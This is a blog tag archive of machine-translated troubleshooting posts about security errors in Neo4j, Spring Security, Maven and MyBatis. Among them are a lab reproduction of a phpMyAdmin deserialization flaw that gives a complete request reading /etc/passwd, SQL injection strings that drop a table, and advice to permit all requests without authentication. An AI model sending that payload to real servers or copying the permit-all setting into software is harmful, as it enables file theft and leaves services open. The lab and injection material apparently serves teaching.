Tag Archives: security

[Solved] ClientError.Security.Unauthorized: The client is unauthorized due to authentication failure.

Neo.ClientError.Security.Unauthorized: The client is unauthorized due to authentication failure.
the authentication of the Community Edition failed. The solution:
stop the service, find the auth file under the data/DBMS in the installation directory and delete it. (because my installation package was downloaded from the website, the former owner may have set the password, so after we delete it, the default password is neo4j). Just start the service.

In addition, the community version cannot be too high. It needs to adapt to its own java version. My java version is 1.8, so the community version needs to be version 4

[Solved] spring boot security Start Error: ‘login.html?error‘ is not a valid redirect URL

Configure custom login page

http.formLogin().loginPage("login.html")  //Custom login page The error is caused by this, the page needs to be preceded by a slash
                .loginProcessingUrl("/login") // the address of the action in the login form, which is the path of the authentication request
                .usernameParameter("username")
                .passwordParameter("password")
                .defaultSuccessUrl("/home"); //Default jump path after successful login

Change to

http.formLogin().loginPage("/login.html")
                .loginProcessingUrl("/login")
                .usernameParameter("username")
                .passwordParameter("password")
                .defaultSuccessUrl("/home");

Pikachu vulnerability is installed in the shooting range, and an error is reported when connecting to the MySQL database

During the installation of Pikachu vulnerability shooting range, the processing methods of connecting to MySQL database and reporting errors are as follows:

1. Confirm that the database can be connected normally. Try connecting with tools. If it is not normal, please check the configuration problems such as service, user name and password
2. Modify the IP address, user name and password of the database in config.inc.php to the IP, user name and password of the database. Both the root directory and pkxss have this file and need to be modified.

Config.inc.php in the root directory \ pkxss \ Inc also needs to be modified. It’s difficult.

[Solved] java.lang.reflect.InaccessibleObjectException: Unable to make protected java.net.http.HttpRequest()…

Error message:

Page:

Back end:

java.lang.reflect.InaccessibleObjectException: Unable to make protected java.net.http.HttpRequest() accessible: module java.net.http does not "opens java.net.http" to unnamed module @621f89b8

Solution:

Change the parameters passed in the controller:   HttpRequest   ——》  HttpServletRequest

CompilationFailureException: Compilation failure error: cannot access NotThreadSafe

Error content:

Caused by: org.apache.maven.plugin.compiler.CompilationFailureException: Compilation failure
error: cannot access NotThreadSafe

Error reporting reason:

            <dependency>
                <groupId>org.apache.httpcomponents</groupId>
                <artifactId>httpclient</artifactId>
                <version>4.5.2</version>
            </dependency>
            <dependency>
                <groupId>org.apache.httpcomponents</groupId>
                <artifactId>httpcore</artifactId>
                <version>4.4.5</version>
            </dependency>

The versions of httpclient and HttpCore packages do not match.

be careful! Many online Posts say that reducing HttpCore to 4.4.4 can solve the problem, because 4.5.2 and 4.4.4 match.

However, the httpclient package itself has security vulnerabilities and is vulnerable to XSS attacks.

For httpclient problems, see: https://github.com/advisories/GHSA-7r82-7xv7-xcpj
Apache HttpClient versions prior to version 4.5.13 and 5.0.3 can misinterpret malformed authority component in request URIs passed to the library as java.net.URI object and pick the wrong target host for request execution.

Therefore, you can upgrade httpclient to 4.5.13 here, which matches 4.4.5 of HttpCore. satisfy both sides.

Correct reference posture:

            <dependency>
                <groupId>org.apache.httpcomponents</groupId>
                <artifactId>httpclient</artifactId>
                <version>4.5.13</version>
            </dependency>
            <dependency>
                <groupId>org.apache.httpcomponents</groupId>
                <artifactId>httpcore</artifactId>
                <version>4.4.5</version>
            </dependency>

Several problems caused by device encryption

Description: ora-12541tns no monitor program + velvet software icon turns black

Problem Description:                 

         After Oracle is unloaded and reloaded, ora-12541tns no monitor program will not appear for the time being, and then the problem of restarting the computer appears again — the problem solved from the perspective of Oracle (this problem will appear again in a few days after it is solved through other operations — the above error occurs when opening PL/SQL developer software.)

         At the same time, the tinder software icon turns black or the tinder software installation pop-up cannot be installed in the encrypted directory (prompt: when the tinder is installed in other disks other than disk C.).

        At this point, the big probability is due to the problem of device encryption.

resolvent:

        Turn off device encryption settings.

Process (simple operation, just two steps)

1. Window + Q output “device encryption”( The window key icon is similar to the key of the window where the window is turned on. It is generally located near FN in the lower left corner.)

2. Select close( It will take some time)

         I was puzzled by this problem for a period of time. During this period, I solved it through online methods. I even uninstalled Oracle and then reloaded it. At that time, it was solved and there was no problem. However, the problem will still appear later, which is more annoying.

         Later, I found out the problem. The problem is quite special and the solution is also quite special. I would like to share it with those who encounter similar and partial problems. Finally, I hope I can help you solve the problem.

       

      

Feignexception $unauthorized is reported by introducing security call service

Originally, it was a good idea to study spring cloud. Later, security was introduced for security. Then there were various problems. First, the service could not be registered (solution: after introducing security, the service could not be registered with Eureka), and then the service could not be called,

The error log is as follows:

feign.FeignException$Unauthorized: [401] during [GET] to [ http://eureka-client/client/test ] [ClientService#getClientService()]: [{“timestamp”:”2021-07-08T09:01:18.940+00:00″,”status”:401,”error”:”Unauthorized”,”message”:””,”path”:”/client/test”}]

It’s easy to understand if you read a newspaper error: the call has not been authenticated. This authentication is built-in to security. There are some methods on the Internet, but they are messy and many of them don’t work. Therefore, it’s recommended to turn off the built-in call authentication of security (add logic to the call authentication side to ensure security)

Add a configuration file to the server:

@Configuration
@EnableWebSecurity
public class WebSecurityConfig extends WebSecurityConfigurerAdapter {

    @Override
    protected void configure(HttpSecurity httpSecurity) throws Exception {
        httpSecurity.authorizeRequests().anyRequest().permitAll().and().logout().permitAll();
    }

    @Autowired
    public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
        auth.userDetailsService(userDetailsService());
    }

}

Due to the version problem, sometimes you need to add additional notes to the startup file

@SpringBootApplication(exclude = {org.springframework.boot.autoconfigure.security.servlet.SecurityAutoConfiguration.class})

The test is effective
 

[vulnerability recurrence] phpMyAdmin scripts / setup.php deserialization vulnerability (wooyun-2016-199433)

[vulnerability recurrence] phpMyAdmin scripts/setup.php deserialization vulnerability (wooyun-2016-199433)

0x01 vulnerability background

There is a deserialization vulnerability in phpMyAdmin 2. X, through which an attacker can read arbitrary files or execute arbitrary code.

0x02 vulnerability environment

Building docker environment of vulhub

Execute the following command in/home/vulhub/phpMyAdmin/wooyun-2016-199433 to start phpMyAdmin:

docker-compose up -d

Check that the open port is 8080

After the environment is started, visit http://ip : 8080 , you can see the home page of phpMyAdmin. Because there is no connection to the database, an error will be reported at this time, but the exploitation of this vulnerability has nothing to do with the database, so it is ignored.

0x03 vulnerability recurrence

Capturing packets with BP

Send the following packets to read /etc/passwd :

POST /scripts/setup.php HTTP/1.1
Host: ip:8080
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

You can view the contents of the/etc/passwd file.

Chrome Error: Uncaught Error: SECURITY_ERR: DOM Exception 18

Uncaught Error: SECURITY_ERR: DOM Exception 18

Question:
I get the following error in Chrome’s developer tools window when I try to set a cookie using this jQuery plugin:

Uncaught Error: SECURITY_ERR: DOM Exception 18

What does this error mean and how can I fix it? I get the same error when I use this jQuery plugin.

Answer:
You’re most likely using this on a local file over the file://URI scheme, which cannot have cookies set. Put it on a local server so you can use http://localhost.

Can mybatis prevent SQL injection

1. Concept: what is SQL injection

sql injection : is a code injection technology, used to attack data-driven applications, malicious SQL statements are inserted into the executed entity fields.

It’s a common attack. If the attacker enters some special SQL fragments (such as “or 1 = 1”) on the form information or URL of the interface, it is possible to invade the application with incomplete parameter verification. Therefore, some work should be done in application development to prevent SQL injection. In some applications with high security requirements (such as banking software), SQL statements are usually replaced by stored procedures to prevent SQL injection. It’s a very safe way to deal with it.

answer: mybatis can prevent SQL injection, please continue to read.

2. Implementation: mybatis prevents SQL injection

<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
  select id, username, password, role
     from user
        where username = #{username,jdbcType=VARCHAR}
        and password = #{password,jdbcType=VARCHAR}
</select>
<select id="selectByNameAndPassword" parameterType="java.util.Map" resultMap="BaseResultMap">
    select id, username, password, role
        from user
        where username = ${username,jdbcType=VARCHAR}
        and password = ${password,jdbcType=VARCHAR}
</select>

the difference between # and $ in mybatis:

1. # will treat all incoming parameters as a string, and will automatically add a double quotation mark to it.

For example: where user name = # {user name}, if the value passed in is 111, then the value parsed into SQL is where user name = # {user name}. If the value passed in is ID, then the value parsed into SQL is where user name = # {user name}

2. $ directly displays and generates the incoming data in SQL.

For example: where user name = ${user name}, if the value passed in is 111, then the value parsed into SQL is where user name = 111

If the passed in value is; drop table user;, then the parsed SQL is: select id, username, password, role from user where username =; drop table user

3. The # method can prevent SQL injection to a great extent, while the $ method cannot prevent SQL injection.

4. The $ method is generally used to pass in database objects, such as table names

5. It is recommended to use #, to avoid using $. If you have to use parameters like “${XXX}”, you need to do a good job in filtering to prevent SQL injection attacks.

6. In mybatis, parameters with “${XXX}” format will directly participate in SQL compilation, so injection attack cannot be avoided. But when it comes to dynamic table names and column names, we can only use parameter formats like “${XXX}”. Therefore, such parameters need to be handled manually in the code to prevent injection.

[Conclusion] the format of “# {XXX}” should be used as much as possible when writing the mapping statement of mybatis. If you have to use parameters like “${XXX}”, you should do a good job of filtering manually to prevent SQL injection attacks.

3. Principle analysis: how does mybatis prevent SQL injection

Mybatis framework is a semi-automatic persistence layer framework , SQL statements need to be written manually by developers, at this time, SQL injection must be prevented. In fact, mybatis SQL has the function of “ input + output “, which is similar to the function structure. Please refer to the above two examples. Among them, parametertype indicates the input parameter type and resulttype indicates the output parameter type. In retrospect, if you want to prevent SQL injection, you have to do something about the input parameters. In the above code, #, is the part where input parameters are spliced in SQL. After the parameters are passed in, the executed SQL statement will be printed out, as follows:

select id, username, password, role from user where username=?and password=?

That is, no matter what kind of parameters you enter, the printed SQL will look like the above. Reason: mybatis enables the precompile function. Before SQL execution, SQL will be sent to the database for compilation. During execution, the compiled SQL will be used directly, and the parameter can replace the “?” in the place holder. Because SQL injection can only work on the compilation process, this way can avoid SQL injection attack.

[underlying implementation principle] how does mybatis precompile SQL?In fact, at the bottom of the framework, it is the Preparedstatement class in JDBC that works. Preparedstatement is a subclass of statement that we are very familiar with. Its objects contain compiled SQL statements. This “ready” approach not only improves security, but also improves efficiency when executing the same SQL multiple times. The reason is that the SQL has been compiled and there is no need to compile it again.

//Safe, pre-compiled
Connection conn = getConn();//Get the connection
String sql = "select id, username, password, role from user where id=?" ; // the statement will be pre-compiled before executing sql
PreparedStatement pstmt = conn.prepareStatement(sql); 
pstmt.setString(1, id); 
ResultSet rs=pstmt.executeUpdate(); 
......

//Unsafe, not pre-compiled
private String getNameByUserId(String userId) {
    Connection conn = getConn();//connected
    String sql = "select id,username,password,role from user where id=" + id;
    //When the id parameter is "3;drop table user;", the executed sql statement is as follows:
    //select id,username,password,role from user where id=3; drop table user;  
    PreparedStatement pstmt =  conn.prepareStatement(sql);
    ResultSet rs=pstmt.executeUpdate();
    ......
}

Conclusion

#{}: equivalent to Preparedstatement in JDBC

${}: is the value of the output variable

In short: # {} needs to be precompiled, which is safe; ${} only takes variable values without precompiling, which is not safe, and there is a risk of SQL injection attack.

If ${} is used after the order by statement, there is a risk of SQL injection when nothing is done. Need to develop this code level parameter verification, filtering parameters, parameter length, whether in the expected set, whether contains special or database keywords.

Push failed Unable to access ‘https://github.com/‘: Failed to connect to github.com port 443: Timed

Remote push error to GitHub warehouse:

Push failed Unable to access ‘ https://github.com/ ‘: Failed to connect to github.com port 443: Timed out

terms of settlement:

Find the GitHub login Certificate in the certificate manager of the control panel and modify the account password.

You can also open it quickly through the CMD window, enter: rundll32.exe keymgr.dll ,KRShowKeyMgr